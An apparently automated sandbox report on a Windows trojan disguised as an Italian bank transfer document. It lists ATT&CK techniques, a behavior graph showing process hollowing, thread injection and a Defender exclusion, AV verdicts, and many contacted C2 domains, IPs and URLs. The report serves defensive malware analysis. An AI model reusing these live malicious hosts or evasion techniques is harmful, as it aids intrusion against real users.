          Virtualization/Sandbox Evasion          		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
          DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
          DLL Side-Loading          		DCSync1
          Application Window Discovery          		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
          Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
          Rootkit          		Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
          Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt1
          Masquerading          		/etc/passwd and /etc/shadowNetwork SniffingDirect Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
          IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCron41
          Virtualization/Sandbox Evasion          		Network SniffingNetwork Service DiscoveryShared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement
          Network Security AppliancesDomainsCompromise Software Dependencies and Development ToolsAppleScriptLaunchdLaunchd512
          Process Injection          		Input CaptureSystem Network Connections DiscoverySoftware Deployment ToolsRemote Data StagingMail ProtocolsExfiltration Over Unencrypted Non-C2 ProtocolFirmware Corruption

          Behavior Graph

          Hide Legend

          Legend:

          • Process
          • Signature
          • Created File
          • DNS/IP Info
          • Is Dropped
          • Is Windows Process
          • Number of created Registry Values
          • Number of created Files
          • Visual Basic
          • Delphi
          • Java
          • .Net C# or VB.NET
          • C, C++ or other language
          • Is malicious
          • Internet
          behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1460774 Sample: Documento di bonifico banca... Startdate: 21/06/2024 Architecture: WINDOWS Score: 100 36 www.sxybet88.com 2->36 38 www.shuaninvolved.site 2->38 40 9 other IPs or domains 2->40 48 Snort IDS alert for network traffic 2->48 50 Found malware configuration 2->50 52 Malicious sample detected (through community Yara rule) 2->52 54 14 other signatures 2->54 11 Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exe 4 2->11         started        signatures3 process4 file5 34 Documento di bonif...13 EUR23750.exe.log, ASCII 11->34 dropped 64 Adds a directory exclusion to Windows Defender 11->64 66 Injects a PE file into a foreign processes 11->66 15 Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exe 11->15         started        18 powershell.exe 23 11->18         started        20 Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exe 11->20         started        signatures6 process7 signatures8 68 Modifies the context of a thread in another process (thread injection) 15->68 70 Maps a DLL or memory area into another process 15->70 72 Sample uses process hollowing technique 15->72 76 2 other signatures 15->76 22 explorer.exe 88 1 15->22 injected 74 Loading BitLocker PowerShell Module 18->74 25 conhost.exe 18->25         started        process9 dnsIp10 42 www.hemophilia-treatment-41433.bond 185.53.179.92, 64864, 80 TEAMINTERNET-ASDE Germany 22->42 44 ombak99.lol 192.64.118.107, 64866, 80 NAMECHEAP-NETUS United States 22->44 46 6 other IPs or domains 22->46 27 control.exe 22->27         started        process11 signatures12 56 Modifies the context of a thread in another process (thread injection) 27->56 58 Maps a DLL or memory area into another process 27->58 60 Tries to detect virtualization through RDTSC time measurements 27->60 62 Switches to a custom stack to bypass stack traces 27->62 30 cmd.exe 1 27->30         started        process13 process14 32 conhost.exe 30->32         started       

          Screenshots

          Thumbnails

          This section contains all screenshots as thumbnails, including those not shown in the slideshow.


          windows-stand

          Antivirus, Machine Learning and Genetic Malware Detection

          Initial Sample

          SourceDetectionScannerLabelLink
          Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exe79%ReversingLabsWin32.Trojan.Znyonm
          Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exe100%Joe Sandbox ML

          Dropped Files

          No Antivirus matches

          Unpacked PE Files

          No Antivirus matches

          Domains

          No Antivirus matches

          URLs

          SourceDetectionScannerLabelLink
          http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name0%URL Reputationsafe
          http://www.ainth.com0%Avira URL Cloudsafe
          http://www.vanessasmobilespa.com/pz12/0%Avira URL Cloudsafe
          www.jnhdh8827.com/pz12/0%Avira URL Cloudsafe
          http://www.loyalbahis356.comReferer:0%Avira URL Cloudsafe
          http://www.cripmz.xyz0%Avira URL Cloudsafe
          https://excel.office.com0%Avira URL Cloudsafe
          http://www.paucanyes.com/pz12/www.ombak99.lol0%Avira URL Cloudsafe
          http://www.paucanyes.com/pz12/?Ft6LPF=wmB39g7fMVvhAuIXrcacNlSYByOKhXrL5caurGICgekgrDmbedkAGJpMCJINZ+FV4qAD&Ev2=OjrLPv0Hh4WLu0%Avira URL Cloudsafe
          http://www.motchillssss.top100%Avira URL Cloudmalware
          https://api.msn.com:443/v1/news/Feed/Windows?0%Avira URL Cloudsafe
          http://www.jnhdh8827.comReferer:0%Avira URL Cloudsafe
          http://www.paucanyes.com0%Avira URL Cloudsafe
          http://www.motchillssss.top/pz12/100%Avira URL Cloudmalware
          http://www.ombak99.lol/pz12/0%Avira URL Cloudsafe
          https://api.msn.com/v1/news/Feed/Windows?activityId=3B22F7CF85C14EF68AA6229BF5B3705E&timeOut=5000&oc0%Avira URL Cloudsafe
          http://www.motchillssss.top/pz12/?Ft6LPF=bG4RJrnXbim/D3cBlUwrMYqb2ZS77l+Go/8AkclYnXcXK2JRZ8TcvaCLEE/32UP8PfnZ&Ev2=OjrLPv0Hh4WLu100%Avira URL Cloudmalware
          http://www.loyalbahis356.com/pz12/?Ft6LPF=mhHbh1AUgvkDqhcxvrHPgmJxw//lx/+38lrQrf/b9xTaJsLm+Z3/RBaY9IBcU0d9A8jH&Ev2=OjrLPv0Hh4WLu100%Avira URL Cloudmalware
          https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13pwi30%Avira URL Cloudsafe
          http://www.4hu259.com0%Avira URL Cloudsafe
          http://www.shuaninvolved.site/pz12/?Ft6LPF=QmILE5Yj5FPxS0L9f6nor9rKO5Y2+RnVUWg4I1d5MMTzUgBssQh0GRAykt5Xu8CyVf+z&Ev2=OjrLPv0Hh4WLu0%Avira URL Cloudsafe
          http://www.ebehemin.com/pz12/100%Avira URL Cloudmalware
          https://www.rd.com/list/best-cities-by-generation/0%Avira URL Cloudsafe
          https://www.msn.com/en-us/health/medical/mayo-clinic-minute-who-benefits-from-taking-statins/ar-AA1h0%Avira URL Cloudsafe
          https://activity.windows.com/UserActivity.ReadWrite.CreatedByAppexe0%Avira URL Cloudsafe
          http://www.sxybet88.com/pz12/www.ainth.com0%Avira URL Cloudsafe
          http://www.cripmz.xyzReferer:0%Avira URL Cloudsafe
          http://schemas.microsoft0%Avira URL Cloudsafe
          https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13pwi3-dark0%Avira URL Cloudsafe
          https://assets.msn.com/weathermapdata/1/static/weather/taskbar/animation/WeatherInsights/WeatherInsi0%Avira URL Cloudsafe
          https://www.msn.com/en-us/news/us/counterpoint-individual-parents-rights-do-not-translate-to-a-licen0%Avira URL Cloudsafe
          http://www.shuaninvolved.site0%Avira URL Cloudsafe
          https://word.office.com0%Avira URL Cloudsafe
          https://www.msn.com/en-us/money/realestate/my-husband-and-i-paid-off-our-mortgage-more-than-15-years0%Avira URL Cloudsafe
          https://assets.msn.com/weathermapdata/1/static/finance/1stparty/FinanceTaskbarIcons/Finance_Earnings0%Avira URL Cloudsafe
          http://www.hemophilia-treatment-41433.bond/pz12/?Ft6LPF=I28W/3a7leZLTJTVQ6pLzOFASFQBM/RHJVT607x5WCzJ2jZGT2NOi6Mb2MIHH5pYEuLB&Ev2=OjrLPv0Hh4WLu0%Avira URL Cloudsafe
          https://login.microsoftonline.co100%Avira URL Cloudphishing
          http://www.4hu259.comReferer:0%Avira URL Cloudsafe
          https://buy.live.com/0%Avira URL Cloudsafe
          http://www.surejobzapp.com/pz12/www.xiangadvanced.site0%Avira URL Cloudsafe
          https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13fcaT-dark0%Avira URL Cloudsafe
          http://www.hemophilia-treatment-41433.bondReferer:0%Avira URL Cloudsafe
          http://www.xiangadvanced.site/pz12/0%Avira URL Cloudsafe
          https://windows.msn.com:443/shell?osLocale=en-GB&chosenMarketReason=ImplicitNew0%Avira URL Cloudsafe
          https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gMeu0%Avira URL Cloudsafe
          https://outlook.com0%Avira URL Cloudsafe
          http://www.ombak99.lol0%Avira URL Cloudsafe
          http://www.sxybet88.com/pz12/?Ft6LPF=oomdQ+KKoNdRQ1HBV3YuY4HYSwe0GXxiurC4ZPs5qTfDQPHef20Z2PpAaiNPivFMepGH&Ev2=OjrLPv0Hh4WLu0%Avira URL Cloudsafe
          http://www.ainth.comReferer:0%Avira URL Cloudsafe
          http://www.loyalbahis356.com100%Avira URL Cloudmalware
          https://android.notify.windows.com/iOS0%Avira URL Cloudsafe
          https://www.msn.com/en-us/lifestyle/home-and-garden/10-vital-home-maintenance-tasks-you-ll-regret-if0%Avira URL Cloudsafe
          http://www.surejobzapp.comReferer:0%Avira URL Cloudsafe
          https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Condition/MostlyClearNight.svg0%Avira URL Cloudsafe
          http://www.paucanyes.com/pz12/0%Avira URL Cloudsafe
          http://www.xiangadvanced.site0%Avira URL Cloudsafe
          https://account.activedirectory.0%Avira URL Cloudsafe
          http://www.meidupro.comReferer:0%Avira URL Cloudsafe
          https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13fcaT0%Avira URL Cloudsafe
          http://www.shuaninvolved.site/pz12/www.cripmz.xyz0%Avira URL Cloudsafe
          https://passwordreset.micros0%Avira URL Cloudsafe
          https://api.msn.com/v1/news/Feed/Windows?0%Avira URL Cloudsafe
          http://www.meidupro.com0%Avira URL Cloudsafe
          http://www.cripmz.xyz/pz12/www.meidupro.com0%Avira URL Cloudsafe
          http://www.jnhdh8827.com0%Avira URL Cloudsafe
          http://www.sxybet88.com0%Avira URL Cloudsafe
          https://www.msn.com/en-us/news/politics/kinzinger-has-theory-about-who-next-house-speaker-will-be/vi0%Avira URL Cloudsafe
          https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Teaser/recordhigh.svg0%Avira URL Cloudsafe
          http://www.shuaninvolved.site/pz12/0%Avira URL Cloudsafe
          http://schemas.micro0%Avira URL Cloudsafe
          http://www.4hu259.com/pz12/www.vanessasmobilespa.com0%Avira URL Cloudsafe
          http://tempuri.org/DataSet1.xsd;Please0%Avira URL Cloudsafe
          https://www.msn.com/en-us/money/careersandeducation/student-loan-debt-forgiveness-arrives-for-some-b0%Avira URL Cloudsafe
          http://www.ebehemin.com100%Avira URL Cloudmalware
          https://wns.windows.com/EM00%Avira URL Cloudsafe
          http://www.motchillssss.topReferer:0%Avira URL Cloudsafe
          http://www.vanessasmobilespa.com/pz12/www.surejobzapp.com0%Avira URL Cloudsafe
          https://www.msn.com/en-us/weather/topstories/us-winter-forecast-for-the-2023-2024-season/ar-AA1hGINt0%Avira URL Cloudsafe
          http://www.ainth.com/pz12/www.motchillssss.top0%Avira URL Cloudsafe
          http://www.ainth.com/pz12/?Ft6LPF=wKkXOPvX+avhNB0WpobAo/RdD5Vgm0uLsJUbUuPKtyZfimvU+K3iz8PSEmeh48r72CNx&Ev2=OjrLPv0Hh4WLu0%Avira URL Cloudsafe
          https://android.notify.windows.com/iOSdX0%Avira URL Cloudsafe
          https://windows.msn.com:443/shellv2?osLocale=en-GB&chosenMarketReason=ImplicitNew0%Avira URL Cloudsafe
          http://www.vanessasmobilespa.comReferer:0%Avira URL Cloudsafe
          https://www.msn.com/en-us/news/politics/vote-to-oust-mccarthy-is-a-warning-sign-for-democracy-schola0%Avira URL Cloudsafe
          http://www.ebehemin.comReferer:0%Avira URL Cloudsafe
          http://www.surejobzapp.com0%Avira URL Cloudsafe
          https://account.li0%Avira URL Cloudsafe
          http://www.vanessasmobilespa.com0%Avira URL Cloudsafe
          http://www.xiangadvanced.siteReferer:0%Avira URL Cloudsafe
          https://www.msn.com/en-us/news/world/pastor-of-atlanta-based-megachurch-faces-backlash-after-controv0%Avira URL Cloudsafe
          https://www.msn.com/en-us/news/politics/here-s-what-house-rules-say-about-trump-serving-as-speaker-o0%Avira URL Cloudsafe
          https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gMeu-dark0%Avira URL Cloudsafe
          http://www.sxybet88.com/pz12/0%Avira URL Cloudsafe
          https://www.msn.com/en-us/money/personalfinance/the-no-1-phrase-people-who-are-good-at-small-talk-al0%Avira URL Cloudsafe
          http://www.xiangadvanced.site/pz12/www.ebehemin.com0%Avira URL Cloudsafe
          http://www.ombak99.lol/pz12/?Ft6LPF=oHprbzlDionZVyQ1tKhLJIMMM9VbSt1+94xivpjLAu060YRgv/mETNkmThmCujjhO3iW&Ev2=OjrLPv0Hh4WLu0%Avira URL Cloudsafe
          https://www.msn.com/en-us/news/world/ukraine-live-briefing-biden-does-worry-house-drama-will-impact-0%Avira URL Cloudsafe
          http://www.ombak99.lol/pz12/www.shuaninvolved.site0%Avira URL Cloudsafe
          http://www.paucanyes.comReferer:0%Avira URL Cloudsafe
          http://www.hemophilia-treatment-41433.bond0%Avira URL Cloudsafe

          Domains and IPs

          Contacted Domains

          NameIPActiveMaliciousAntivirus DetectionReputation
          www.ainth.com
          		3.64.163.50
          		truetrue
            		unknown
            www.hemophilia-treatment-41433.bond
            		185.53.179.92
            		truetrue
              		unknown
              ombak99.lol
              		192.64.118.107
              		truetrue
                		unknown
                www.meidupro.com
                		107.158.172.173
                		truetrue
                  		unknown
                  www.paucanyes.com
                  		103.169.142.0
                  		truetrue
                    		unknown
                    www.sxybet88.com
                    		188.114.97.3
                    		truetrue
                      		unknown
                      www.loyalbahis356.com
                      		185.148.106.71
                      		truefalse
                        		unknown
                        www.motchillssss.top
                        		172.67.158.16
                        		truetrue
                          		unknown
                          www.jnhdh8827.com
                          		188.114.96.3
                          		truetrue
                            		unknown
                            www.shuaninvolved.site
                            		188.114.96.3
                            		truetrue
                              		unknown
                              www.ombak99.lol
                              		unknown
                              		unknowntrue
                                		unknown

                                Contacted URLs

                                NameMaliciousAntivirus DetectionReputation
                                http://www.paucanyes.com/pz12/?Ft6LPF=wmB39g7fMVvhAuIXrcacNlSYByOKhXrL5caurGICgekgrDmbedkAGJpMCJINZ+FV4qAD&Ev2=OjrLPv0Hh4WLutrue
                                • Avira URL Cloud: safe
                                		unknown
                                www.jnhdh8827.com/pz12/true
                                • Avira URL Cloud: safe
                                		unknown
                                http://www.shuaninvolved.site/pz12/?Ft6LPF=QmILE5Yj5FPxS0L9f6nor9rKO5Y2+RnVUWg4I1d5MMTzUgBssQh0GRAykt5Xu8CyVf+z&Ev2=OjrLPv0Hh4WLutrue
                                • Avira URL Cloud: safe
                                		unknown
                                http://www.loyalbahis356.com/pz12/?Ft6LPF=mhHbh1AUgvkDqhcxvrHPgmJxw//lx/+38lrQrf/b9xTaJsLm+Z3/RBaY9IBcU0d9A8jH&Ev2=OjrLPv0Hh4WLufalse
                                • Avira URL Cloud: malware
                                		unknown
                                http://www.motchillssss.top/pz12/?Ft6LPF=bG4RJrnXbim/D3cBlUwrMYqb2ZS77l+Go/8AkclYnXcXK2JRZ8TcvaCLEE/32UP8PfnZ&Ev2=OjrLPv0Hh4WLutrue
                                • Avira URL Cloud: malware
                                		unknown
                                http://www.hemophilia-treatment-41433.bond/pz12/?Ft6LPF=I28W/3a7leZLTJTVQ6pLzOFASFQBM/RHJVT607x5WCzJ2jZGT2NOi6Mb2MIHH5pYEuLB&Ev2=OjrLPv0Hh4WLutrue
                                • Avira URL Cloud: safe
                                		unknown
                                http://www.sxybet88.com/pz12/?Ft6LPF=oomdQ+KKoNdRQ1HBV3YuY4HYSwe0GXxiurC4ZPs5qTfDQPHef20Z2PpAaiNPivFMepGH&Ev2=OjrLPv0Hh4WLutrue
                                • Avira URL Cloud: safe
                                		unknown
                                http://www.ainth.com/pz12/?Ft6LPF=wKkXOPvX+avhNB0WpobAo/RdD5Vgm0uLsJUbUuPKtyZfimvU+K3iz8PSEmeh48r72CNx&Ev2=OjrLPv0Hh4WLutrue
                                • Avira URL Cloud: safe
                                		unknown
                                http://www.ombak99.lol/pz12/?Ft6LPF=oHprbzlDionZVyQ1tKhLJIMMM9VbSt1+94xivpjLAu060YRgv/mETNkmThmCujjhO3iW&Ev2=OjrLPv0Hh4WLutrue
                                • Avira URL Cloud: safe
                                		unknown

                                URLs from Memory and Binaries

                                NameSourceMaliciousAntivirus DetectionReputation
                                http://www.ainth.comexplorer.exe, 00000007.00000003.2191969576.000000000BF52000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.3777293981.000000000BF44000.00000004.00000001.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: safe
                                		unknown
                                http://www.cripmz.xyzexplorer.exe, 00000007.00000003.2191969576.000000000BF52000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.3777293981.000000000BF44000.00000004.00000001.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: safe
                                		unknown
                                https://api.msn.com:443/v1/news/Feed/Windows?explorer.exe, 00000007.00000002.3770457753.0000000008761000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.3768370423.000000000695E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.1362225789.000000000695E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.1367583891.0000000008761000.00000004.00000001.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: safe
                                		unknown
                                http://www.vanessasmobilespa.com/pz12/explorer.exe, 00000007.00000003.2191969576.000000000BF52000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.3777293981.000000000BF44000.00000004.00000001.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: safe
                                		unknown
                                https://excel.office.comexplorer.exe, 00000007.00000002.3770457753.0000000008632000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.1367583891.0000000008632000.00000004.00000001.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: safe
                                		unknown
                                http://www.motchillssss.topexplorer.exe, 00000007.00000003.2191969576.000000000BF52000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.3777293981.000000000BF44000.00000004.00000001.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: malware
                                		unknown
                                http://www.loyalbahis356.comReferer:explorer.exe, 00000007.00000003.2191969576.000000000BF52000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.3777293981.000000000BF44000.00000004.00000001.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: safe
                                		unknown
                                http://www.paucanyes.com/pz12/www.ombak99.lolexplorer.exe, 00000007.00000003.2191969576.000000000BF52000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.3777293981.000000000BF44000.00000004.00000001.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: safe
                                		unknown
                                http://www.motchillssss.top/pz12/explorer.exe, 00000007.00000003.2191969576.000000000BF52000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.3777293981.000000000BF44000.00000004.00000001.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: malware
                                		unknown
                                http://www.ombak99.lol/pz12/explorer.exe, 00000007.00000003.2191969576.000000000BF52000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.3777293981.000000000BF44000.00000004.00000001.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: safe
                                		unknown
                                http://www.jnhdh8827.comReferer:explorer.exe, 00000007.00000003.2191969576.000000000BF52000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.3777293981.000000000BF44000.00000004.00000001.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: safe
                                		unknown
                                http://www.paucanyes.comexplorer.exe, 00000007.00000003.2191969576.000000000BF52000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.3777293981.000000000BF44000.00000004.00000001.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: safe
                                		unknown
                                https://api.msn.com/v1/news/Feed/Windows?activityId=3B22F7CF85C14EF68AA6229BF5B3705E&timeOut=5000&ocexplorer.exe, 00000007.00000002.3768370423.000000000695E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.1362225789.000000000695E000.00000004.00000001.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: safe
                                		unknown
                                http://www.4hu259.comexplorer.exe, 00000007.00000003.2191969576.000000000BF52000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.3777293981.000000000BF44000.00000004.00000001.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: safe
                                		unknown
                                https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13pwi3explorer.exe, 00000007.00000000.1362225789.000000000695E000.00000004.00000001.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: safe
                                		unknown
                                https://activity.windows.com/UserActivity.ReadWrite.CreatedByAppexeexplorer.exe, 00000007.00000003.2192144452.00000000089B8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.1367583891.00000000089B8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.3081656079.00000000089B8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.3771486078.00000000089B8000.00000004.00000001.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: safe
                                		unknown
                                http://www.cripmz.xyzReferer:explorer.exe, 00000007.00000003.2191969576.000000000BF52000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.3777293981.000000000BF44000.00000004.00000001.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: safe
                                		unknown
                                https://www.msn.com/en-us/health/medical/mayo-clinic-minute-who-benefits-from-taking-statins/ar-AA1hexplorer.exe, 00000007.00000002.3768370423.000000000695E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.1362225789.000000000695E000.00000004.00000001.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: safe
                                		unknown
                                https://www.rd.com/list/best-cities-by-generation/explorer.exe, 00000007.00000002.3768370423.000000000695E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.1362225789.000000000695E000.00000004.00000001.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: safe
                                		unknown
                                http://www.ebehemin.com/pz12/explorer.exe, 00000007.00000002.3777293981.000000000BF44000.00000004.00000001.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: malware
                                		unknown
                                http://www.sxybet88.com/pz12/www.ainth.comexplorer.exe, 00000007.00000003.2191969576.000000000BF52000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.3777293981.000000000BF44000.00000004.00000001.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: safe
                                		unknown
                                http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameDocumento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exe, 00000000.00000002.1360830781.0000000002730000.00000004.00000800.00020000.00000000.sdmpfalse
                                • URL Reputation: safe
                                		unknown
                                https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13pwi3-darkexplorer.exe, 00000007.00000000.1362225789.000000000695E000.00000004.00000001.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: safe
                                		unknown
                                https://assets.msn.com/weathermapdata/1/static/weather/taskbar/animation/WeatherInsights/WeatherInsiexplorer.exe, 00000007.00000002.3768370423.000000000695E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.1362225789.000000000695E000.00000004.00000001.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: safe
                                		unknown
                                http://schemas.microsoftexplorer.exe, 00000007.00000003.3082878526.000000000BD86000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.1379438012.000000000BD7B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.3776882833.000000000BD86000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.2199414956.000000000BD83000.00000004.00000001.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: safe
                                		unknown
                                https://www.msn.com/en-us/news/us/counterpoint-individual-parents-rights-do-not-translate-to-a-licenexplorer.exe, 00000007.00000002.3768370423.000000000695E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.1362225789.000000000695E000.00000004.00000001.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: safe
                                		unknown
                                http://www.shuaninvolved.siteexplorer.exe, 00000007.00000003.2191969576.000000000BF52000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.3777293981.000000000BF44000.00000004.00000001.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: safe
                                		unknown
                                https://word.office.comexplorer.exe, 00000007.00000003.3081656079.00000000087ED000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.1367583891.00000000087C2000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.3770457753.00000000087C2000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.2192144452.00000000087EE000.00000004.00000001.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: safe
                                		unknown
                                https://www.msn.com/en-us/money/realestate/my-husband-and-i-paid-off-our-mortgage-more-than-15-yearsexplorer.exe, 00000007.00000002.3768370423.000000000695E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.1362225789.000000000695E000.00000004.00000001.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: safe
                                		unknown
                                https://assets.msn.com/weathermapdata/1/static/finance/1stparty/FinanceTaskbarIcons/Finance_Earningsexplorer.exe, 00000007.00000000.1362225789.000000000695E000.00000004.00000001.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: safe
                                		unknown
                                https://buy.live.com/explorer.exe, 00000007.00000000.1379438012.000000000BA75000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.2199512459.000000000BA75000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.3775303278.000000000BA75000.00000004.00000001.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: safe
                                		unknown
                                https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13fcaT-darkexplorer.exe, 00000007.00000002.3768370423.000000000695E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.1362225789.000000000695E000.00000004.00000001.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: safe
                                		unknown
                                http://www.4hu259.comReferer:explorer.exe, 00000007.00000003.2191969576.000000000BF52000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.3777293981.000000000BF44000.00000004.00000001.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: safe
                                		unknown
                                https://login.microsoftonline.coexplorer.exe, 00000007.00000000.1379438012.000000000BA75000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.2199512459.000000000BA75000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.3775303278.000000000BA75000.00000004.00000001.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: phishing
                                		unknown
                                http://www.surejobzapp.com/pz12/www.xiangadvanced.siteexplorer.exe, 00000007.00000003.2191969576.000000000BF52000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.3777293981.000000000BF44000.00000004.00000001.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: safe
                                		unknown
                                http://www.hemophilia-treatment-41433.bondReferer:explorer.exe, 00000007.00000003.2191969576.000000000BF52000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.3777293981.000000000BF44000.00000004.00000001.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: safe
                                		unknown
                                https://windows.msn.com:443/shell?osLocale=en-GB&chosenMarketReason=ImplicitNewexplorer.exe, 00000007.00000002.3768370423.000000000695E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.1362225789.000000000695E000.00000004.00000001.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: safe
                                		unknown
                                https://outlook.comexplorer.exe, 00000007.00000003.3082354103.0000000008903000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.1367583891.0000000008903000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.3771486078.0000000008903000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.2192144452.0000000008903000.00000004.00000001.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: safe
                                		unknown
                                http://www.ombak99.lolexplorer.exe, 00000007.00000003.2191969576.000000000BF52000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.3777293981.000000000BF44000.00000004.00000001.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: safe
                                		unknown
                                http://www.xiangadvanced.site/pz12/explorer.exe, 00000007.00000003.2191969576.000000000BF52000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.3777293981.000000000BF44000.00000004.00000001.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: safe
                                		unknown
